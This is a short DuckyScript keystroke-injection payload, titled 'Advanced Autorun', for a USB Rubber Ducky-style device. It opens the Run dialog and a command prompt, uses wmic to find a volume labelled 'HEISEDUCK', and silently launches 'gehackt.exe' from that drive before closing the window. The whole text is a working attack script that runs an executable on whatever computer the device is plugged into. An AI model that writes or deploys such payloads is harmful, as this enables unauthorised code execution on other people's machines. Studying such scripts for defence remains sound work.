REM Title: Advanced Autorun
REM Description: Start Ducky.exe
DELAY 5000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "HEISEDUCK"') do set myd=%d
ENTER
DELAY 200
STRING start %myd%\gehackt.exe & exit
ENTER